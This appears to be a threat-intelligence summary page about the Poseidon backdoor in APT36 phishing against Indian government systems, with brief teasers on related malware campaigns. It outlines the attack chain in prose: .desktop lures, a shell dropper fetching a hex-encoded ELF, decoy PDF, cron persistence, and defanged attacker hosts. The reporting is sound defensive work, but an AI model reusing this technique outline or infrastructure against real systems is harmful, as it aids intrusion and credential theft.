Poseidon backdoor deployment in Transparent Tribe phishing attacks
Malware Activity
Summary
Hide ▲
Show ▼
The Poseidon backdoor is now being deployed in Transparent Tribe attacks, creating a path to long-term access and credential harvesting on targeted systems. The malware is delivered through spear-phishing emails and weaponized .desktop shortcut files. It affects both Windows and BOSS Linux environments and can support data collection and lateral movement.
Related Happenings
Geta RAT, Ares RAT, and DeskRAT cross-platform credential-theft activity
Malware Activity
First: 11.02.2026 16:52
Last: 11.02.2026 16:52
Sources 1
About this happening:
**Geta RAT**, **Ares RAT**, and **DeskRAT** are being deployed across **Windows and Linux** in phishing-led intrusions that enable **credential theft**, **persistent access**, and...
Geta RAT, Ares RAT, and DeskRAT cross-platform credential-theft activity
Malware ActivityAbout this happening: **Geta RAT**, **Ares RAT**, and **DeskRAT** are being deployed across **Windows and Linux** in phishing-led intrusions that enable **credential theft**, **persistent access**, and...
NosyDoor backdoor activity using OneDrive and Google Drive C&C
Malware Activity
First: 18.12.2025 19:34
Last: 18.12.2025 19:34
Sources 1
About this happening:
The **NosyDoor** backdoor is being used to **exfiltrate files** and run **shell commands** inside compromised networks, making the **LongNosedGoblin** toolset more dangerous. The...
NosyDoor backdoor activity using OneDrive and Google Drive C&C
Malware ActivityAbout this happening: The **NosyDoor** backdoor is being used to **exfiltrate files** and run **shell commands** inside compromised networks, making the **LongNosedGoblin** toolset more dangerous. The...
FINALDRAFT and ShadowPad toolchain activity
Malware Activity
First: 17.12.2025 13:12
Last: 17.12.2025 13:12
Sources 1
About this happening:
A new **FINALDRAFT** malware variant and **ShadowPad** tooling are being used to increase stealth and **exfiltration throughput** inside compromised networks. The activity support...
FINALDRAFT and ShadowPad toolchain activity
Malware ActivityAbout this happening: A new **FINALDRAFT** malware variant and **ShadowPad** tooling are being used to increase stealth and **exfiltration throughput** inside compromised networks. The activity support...
AI-powered malware families integrating LLMs during execution
Malware Activity
First: 05.11.2025 16:59
Last: 05.11.2025 16:59
Sources 1
About this happening:
Google's GTIG identified **multiple AI-powered malware families** that use **LLMs during execution**, signaling a shift toward malware that can adapt while running. The set includ...
AI-powered malware families integrating LLMs during execution
Malware ActivityAbout this happening: Google's GTIG identified **multiple AI-powered malware families** that use **LLMs during execution**, signaling a shift toward malware that can adapt while running. The set includ...
TikTok activation-guide ClickFix infostealer campaign
Campaign
First: 19.10.2025 21:28
Last: 19.10.2025 21:28
Sources 1
About this happening:
A **TikTok**-based **ClickFix** campaign is using fake **free activation guides** to deliver **info-stealing malware**, putting users seeking software activations at risk of **cre...
TikTok activation-guide ClickFix infostealer campaign
CampaignAbout this happening: A **TikTok**-based **ClickFix** campaign is using fake **free activation guides** to deliver **info-stealing malware**, putting users seeking software activations at risk of **cre...
Timeline
-
25.08.2025 11:13 1 articles · 9mo ago
Transparent Tribe deploys Poseidon in phishing attacks on Indian government systems
Initial DisclosureTransparent Tribe, also called APT36, was observed targeting Indian Government entities with spear-phishing emails and weaponized .desktop shortcut files on Windows and BOSS (Bharat Operating System Solutions) Linux systems. The delivery chain used a shell-script dropper to fetch a hex-encoded file from securestore[.]cv, save it as an ELF binary, open a decoy PDF from Google Drive, and establish contact with the hard-coded C2 server modgovindia[.]space:4000 for commands, payload retrieval, and data exfiltration; the activity was assessed to support the Poseidon backdoor, persistence through a cron job, system reconnaissance, anti-debugging checks, credential harvesting, and potential lateral movement.
Show sources
- Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing — thehackernews.com — 25.08.2025 11:13